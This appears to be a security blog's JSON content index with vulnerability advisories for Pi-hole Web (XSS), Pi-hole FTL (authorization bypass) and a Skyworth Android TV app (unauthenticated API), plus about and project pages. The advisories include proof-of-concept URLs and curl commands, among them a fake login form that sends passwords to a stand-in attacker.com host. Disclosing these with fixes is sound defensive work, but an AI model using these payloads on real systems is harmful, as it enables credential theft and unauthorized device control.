[{"content":"Summary Field Value CVE ID CVE-2026-33403 Advisory GHSA-7xqw-r9pr-qv59 Vulnerability Type Reflected DOM-based XSS / HTML Injection Attack Vector Network CVSS v3.1 Base Score 6.1 (Medium) CVSS v3.1 Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Affected Versions Pi-hole Web v6.0 through v6.4.1 Patched Version v6.5 Discovered By Mohammed Alzahrani, andrejtomci, n1rwhex Description Pi-hole Web versions 6.0 through 6.4.1 contain a reflected XSS / HTML injection vulnerability in scripts/js/taillog.js. The file query parameter is used in an error message that is inserted directly into the DOM via innerHTML without sanitization or escaping.\nVulnerable code location: scripts/js/taillog.js, lines 99–101\nAlthough the application\u0026rsquo;s Content-Security-Policy blocks inline JavaScript execution, the CSP is missing a form-action directive and includes style-src 'unsafe-inline'. This allows an attacker to inject fully styled HTML forms — enabling credential harvesting even without script execution.\nImpact An attacker who tricks a logged-in Pi-hole administrator into clicking a crafted link can:\nHarvest credentials via injected phishing forms that POST to an attacker-controlled server Redirect victims to arbitrary external domains via injected \u0026lt;meta\u0026gt; refresh tags Inject arbitrary HTML into the admin interface with full styling control Proof of Concept 1. HTML Injection Inject arbitrary styled HTML via the file parameter:\nhttp://\u0026lt;PIHOLE_IP\u0026gt;/admin/taillog.php?file=\u0026lt;h1+style=\u0026#34;color:red\u0026#34;\u0026gt;INJECTED\u0026lt;/h1\u0026gt; 2. Credential Phishing (Session Expired Overlay) Inject a full-viewport fake \u0026ldquo;Session Expired\u0026rdquo; form that exfiltrates credentials:\nhttp://\u0026lt;PIHOLE_IP\u0026gt;/admin/taillog.php?file=\u0026lt;div+style=\u0026#34;position:fixed;top:0;left:0;width:100%;height:100%;background:#fff;z-index:9999\u0026#34;\u0026gt;\u0026lt;h2\u0026gt;Session+Expired\u0026lt;/h2\u0026gt;\u0026lt;form+action=\u0026#34;https://attacker.com/collect\u0026#34;+method=\u0026#34;POST\u0026#34;\u0026gt;\u0026lt;input+name=\u0026#34;password\u0026#34;+type=\u0026#34;password\u0026#34;+placeholder=\u0026#34;Re-enter+password\u0026#34;\u0026gt;\u0026lt;button\u0026gt;Login\u0026lt;/button\u0026gt;\u0026lt;/form\u0026gt;\u0026lt;/div\u0026gt; 3. Open Redirect http://\u0026lt;PIHOLE_IP\u0026gt;/admin/taillog.php?file=\u0026lt;meta+http-equiv=\u0026#34;refresh\u0026#34;+content=\u0026#34;0;url=https://attacker.com\u0026#34;\u0026gt; Root Cause Two contributing factors make this exploitable beyond basic HTML injection:\nMissing form-action CSP directive — forms can POST to any external origin style-src 'unsafe-inline' — injected elements can be styled to convincingly overlay the legitimate UI Remediation Update Pi-hole Web to version 6.5 or later.\npihole -up The fix applies HTML escaping to error messages rendered in taillog.js and tightens the CSP policy.\nReferences GitHub Security Advisory — GHSA-7xqw-r9pr-qv59 Pi-hole Web Repository Discovered and reported by Mohammed Alzahrani, andrejtomci, and n1rwhex.\n","permalink":"https://truepositive.me/posts/cve-2026-33403/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eField\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eValue\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCVE ID\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2026-33403\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eAdvisory\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://github.com/pi-hole/web/security/advisories/GHSA-7xqw-r9pr-qv59\"\u003eGHSA-7xqw-r9pr-qv59\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eVulnerability Type\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eReflected DOM-based XSS / HTML Injection\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eAttack Vector\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNetwork\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCVSS v3.1 Base Score\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003e6.1 (Medium)\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCVSS v3.1 Vector\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eAffected Versions\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePi-hole Web v6.0 through v6.4.1\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003ePatched Version\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ev6.5\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eDiscovered By\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMohammed Alzahrani, andrejtomci, n1rwhex\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"description\"\u003eDescription\u003c/h2\u003e\n\u003cp\u003ePi-hole Web versions 6.0 through 6.4.1 contain a reflected XSS / HTML injection vulnerability in \u003ccode\u003escripts/js/taillog.js\u003c/code\u003e. The \u003ccode\u003efile\u003c/code\u003e query parameter is used in an error message that is inserted directly into the DOM via \u003ccode\u003einnerHTML\u003c/code\u003e without sanitization or escaping.\u003c/p\u003e","title":"CVE-2026-33403 — Reflected XSS / HTML Injection in Pi-hole Web (taillog.js)"},{"content":"Summary Field Value CVE ID CVE-2026-35491 Advisory GHSA-r7g8-3fj7-m5qq Vulnerability Type Authorization Bypass CWE CWE-863: Incorrect Authorization Attack Vector Local CVSS v3.1 Base Score 6.1 (Medium) CVSS v3.1 Vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L Affected Versions Pi-hole FTL \u0026gt;= 6.0 through 6.5 Patched Version 6.6 Discovered By Mohammed Alzahrani Description Pi-hole FTL versions 6.0 through 6.5 contain an authorization bypass in the Teleporter import endpoint. CLI-scoped API sessions — intended for read-only operations — are properly rejected by /api/config with HTTP 403, but the /api/teleporter endpoint lacks equivalent authorization checks.\nThis inconsistency allows an attacker with CLI credentials to import a Teleporter archive and modify Pi-hole\u0026rsquo;s configuration, despite the session type being restricted from direct config changes.\nImpact An attacker with CLI credentials can:\nReconfigure Pi-hole — disable DNS blocking, change upstream DNS servers, alter DHCP settings Integrity violation — configuration changes take effect and trigger a system restart Availability impact — DNS resolution behavior can be silently altered or disrupted Proof of Concept Step 1 — Authenticate with CLI credentials to obtain a session ID:\ncurl -s -X POST \u0026#39;http://\u0026lt;PIHOLE_IP\u0026gt;/api/auth\u0026#39; \\ -H \u0026#39;Content-Type: application/json\u0026#39; \\ --data \u0026#39;{\u0026#34;password\u0026#34;:\u0026#34;\u0026lt;cli_password\u0026gt;\u0026#34;}\u0026#39; Step 2 — Confirm CLI session is blocked from direct config changes (expect HTTP 403):\ncurl -s -X PATCH \u0026#39;http://\u0026lt;PIHOLE_IP\u0026gt;/api/config\u0026#39; \\ -H \u0026#39;Content-Type: application/json\u0026#39; \\ -H \u0026#39;X-FTL-SID: \u0026lt;session_id\u0026gt;\u0026#39; \\ --data \u0026#39;{\u0026#34;dns\u0026#34;:{\u0026#34;blocking\u0026#34;:false}}\u0026#39; # Returns: 403 Forbidden Step 3 — Import a Teleporter archive using the same restricted session (succeeds):\ncurl -s -X POST \u0026#39;http://\u0026lt;PIHOLE_IP\u0026gt;/api/teleporter\u0026#39; \\ -H \u0026#39;X-FTL-SID: \u0026lt;session_id\u0026gt;\u0026#39; \\ -F \u0026#39;file=@modified_config.tar.gz\u0026#39; # Returns: 200 OK — configuration applied, system restarts The import succeeds and configuration changes take effect, bypassing the authorization restriction enforced on /api/config.\nRoot Cause The /api/teleporter endpoint does not check whether api-\u0026gt;session-\u0026gt;cli is true before processing import requests. The fix in v6.6 applies the same CLI session rejection logic used in /api/config to the Teleporter import handler.\nRemediation Update Pi-hole FTL to version 6.6 or later.\npihole -up If immediate update is not possible, restrict access to the Pi-hole web interface and API to trusted network segments only.\nReferences GitHub Security Advisory — GHSA-r7g8-3fj7-m5qq Pi-hole FTL Repository Discovered and reported by Mohammed Alzahrani.\n","permalink":"https://truepositive.me/posts/cve-2026-35491/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eField\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eValue\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCVE ID\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2026-35491\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eAdvisory\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ca href=\"https://github.com/pi-hole/FTL/security/advisories/GHSA-r7g8-3fj7-m5qq\"\u003eGHSA-r7g8-3fj7-m5qq\u003c/a\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eVulnerability Type\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAuthorization Bypass\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCWE\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCWE-863: Incorrect Authorization\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eAttack Vector\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eLocal\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCVSS v3.1 Base Score\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003e6.1 (Medium)\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCVSS v3.1 Vector\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eAffected Versions\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePi-hole FTL \u0026gt;= 6.0 through 6.5\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003ePatched Version\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e6.6\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eDiscovered By\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMohammed Alzahrani\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"description\"\u003eDescription\u003c/h2\u003e\n\u003cp\u003ePi-hole FTL versions 6.0 through 6.5 contain an authorization bypass in the Teleporter import endpoint. CLI-scoped API sessions — intended for read-only operations — are properly rejected by \u003ccode\u003e/api/config\u003c/code\u003e with HTTP 403, but the \u003ccode\u003e/api/teleporter\u003c/code\u003e endpoint lacks equivalent authorization checks.\u003c/p\u003e","title":"CVE-2026-35491 — Authorization Bypass in Pi-hole FTL via Teleporter Endpoint"},{"content":"Summary Field Value CVE ID CVE-2026-37762 Vulnerability Type Missing Authentication / Insecure Permissions CWE CWE-306, CWE-732 Attack Vector Network (Adjacent) CVSS v3.1 Base Score 8.8 (High) CVSS v3.1 Vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Assigned By MITRE Status Published Discovered By Mohammed Alzahrani Affected Products Field Value Device Skyworth SW-22AE NF (MediaTek m7332 platform) Firmware Build SW/SW6H_TG_NF/SW6H:11/RTT2.220103.001/20250701:user/release-keys Android Version 11 Security Patch 2025-06-01 Vulnerable App com.smartdevice.dailyshortcut (DailyHub) App Version 1.0.268.250721 (versionCode 1000268) System UID userId=1000 Code Path /system_ext/app/DailyHub Description The DailyHub system application (com.smartdevice.dailyshortcut), pre-installed on Skyworth Android TV devices, exposes two unauthenticated network services:\nHTTP server on TCP port 8081 — via NanoHTTPD, accepting JSON-RPC style POST requests Plaintext TCP control service on port 8888 — accepting raw control commands Both services require no authentication, pairing, or authorization of any kind.\nAffected components:\ncom.smartdevice.dailyshortcut com.smartdevice.ipcontrol.SddpService com.smartdevice.ipcontrol.IPControlService com.smartdevice.ipcontrol.server.IPControlServer (NanoHTTPD on port 8081) com.smartdevice.ipcontrol.processor.SystemRequestProcessor (/system) A network-adjacent attacker (same Wi-Fi or LAN segment) can send crafted HTTP POST requests to http://\u0026lt;TV_IP\u0026gt;:8081/* with JSON payloads of the form:\n{\u0026#34;method\u0026#34;: \u0026#34;\u0026lt;method_name\u0026gt;\u0026#34;, \u0026#34;params\u0026#34;: [...]} Because the application runs as a system app with userId=1000, successful exploitation provides access to privileged system-level operations.\nImpact Remote Command Execution — Arbitrary system methods can be invoked via the unauthenticated HTTP API Privilege Escalation — System-level access (userId=1000) granted to unauthenticated network attacker Information Disclosure — Device configuration, internal state, and system information exposed Denial of Service — Device can be disrupted or rendered unresponsive via crafted requests Proof of Concept (Safe, Non-Destructive) The following request retrieves system information without any credentials:\ncurl -s -X POST \u0026#39;http://\u0026lt;TV_IP\u0026gt;:8081/system\u0026#39; \\ -H \u0026#39;Content-Type: application/json\u0026#39; \\ --data \u0026#39;{\u0026#34;method\u0026#34;:\u0026#34;getSystemInformation\u0026#34;,\u0026#34;params\u0026#34;:[]}\u0026#39; Replace \u0026lt;TV_IP\u0026gt; with the target device\u0026rsquo;s IP address on the local network. No token, PIN, or pairing required.\nThis PoC is non-destructive and only reads device information. It demonstrates that the HTTP API is fully unauthenticated.\nRemediation For users:\nIsolate smart TV devices on a dedicated VLAN or IoT network segment Apply firmware updates from Skyworth when available Monitor for unexpected outbound connections from TV devices For the vendor:\nImplement authentication and authorization for all exposed network services Disable unauthenticated access to system-level methods Bind services to localhost unless explicit user consent is obtained Require pairing/PIN before accepting remote commands Disclosure Timeline Date Event 2026 Vulnerability discovered 2026 Reported to vendor 2026 Vendor acknowledged 2026-06-28 CVE-2026-37762 assigned by MITRE References MITRE CVE Record — CVE-2026-37762 NVD Entry Skyworth Discovered by Mohammed Alzahrani\n","permalink":"https://truepositive.me/posts/cve-2026-37762/","summary":"\u003ch2 id=\"summary\"\u003eSummary\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eField\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eValue\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCVE ID\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2026-37762\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eVulnerability Type\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMissing Authentication / Insecure Permissions\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCWE\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCWE-306, CWE-732\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eAttack Vector\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNetwork (Adjacent)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCVSS v3.1 Base Score\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003e8.8 (High)\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCVSS v3.1 Vector\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eCVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eAssigned By\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMITRE\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eStatus\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePublished\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eDiscovered By\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMohammed Alzahrani\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"affected-products\"\u003eAffected Products\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eField\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eValue\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eDevice\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSkyworth SW-22AE NF (MediaTek m7332 platform)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eFirmware Build\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eSW/SW6H_TG_NF/SW6H:11/RTT2.220103.001/20250701:user/release-keys\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eAndroid Version\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e11\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eSecurity Patch\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e2025-06-01\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eVulnerable App\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003ecom.smartdevice.dailyshortcut\u003c/code\u003e (DailyHub)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eApp Version\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e1.0.268.250721 (versionCode 1000268)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eSystem UID\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003euserId=1000\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003cstrong\u003eCode Path\u003c/strong\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e/system_ext/app/DailyHub\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"description\"\u003eDescription\u003c/h2\u003e\n\u003cp\u003eThe \u003cstrong\u003eDailyHub\u003c/strong\u003e system application (\u003ccode\u003ecom.smartdevice.dailyshortcut\u003c/code\u003e), pre-installed on Skyworth Android TV devices, exposes two unauthenticated network services:\u003c/p\u003e","title":"CVE-2026-37762 — Unauthenticated RCE and Input Injection in Skyworth Android TV (DailyHub)"},{"content":"whoami I\u0026rsquo;m Mohammed Alzahrani, a Senior Cybersecurity Analyst, Threat Hunter, and Security Researcher.\nI focus on threat hunting, incident response, and offensive security research. This blog is where I document findings, techniques, and writeups from my work and research.\nCertifications OSTH — Certified Threat Hunter eCTHPv2 — Certified Threat Hunting Professional eCIR — Certified Incident Responder Topics I write about Threat hunting techniques and playbooks Incident response case studies Red team \u0026amp; offensive security Malware analysis Find me GitHub: mzalzahrani LinkedIn: Mohammed Alzahrani Email: truepositive350@pm.me ","permalink":"https://truepositive.me/about/","summary":"about","title":"About"},{"content":"Tools \u0026amp; Projects Alien Parser DFIR tool for extracting YARA matches from THOR JSON logs\nA CLI utility for DFIR analysts and threat hunters. Processes THOR scan output and converts YARA rule matches into clean, filterable CSV files — cutting triage time during incident response.\nFeatures:\nExtract YARA matches from THOR JSON logs Filter by score threshold (0–100) Filter by specific rule name Generate JSON summary reports with host statistics No external dependencies (Python 3.7+ standard library only) Usage:\n# Basic extraction python yaraconvert.py -i thor_log.json -o results.csv # High priority only (score \u0026gt;= 80) python yaraconvert.py -i thor_log.json -o high_priority.csv --min-score 80 # Filter by rule name python yaraconvert.py -i thor_log.json -o results.csv --rule-name RULE123 Output fields: timestamp, hostname, file path, hashes (MD5/SHA1/SHA256), YARA rule name, tags, author, matched data, offset, context.\nView on GitHub — MIT License\n","permalink":"https://truepositive.me/projects/","summary":"projects","title":"Projects"}]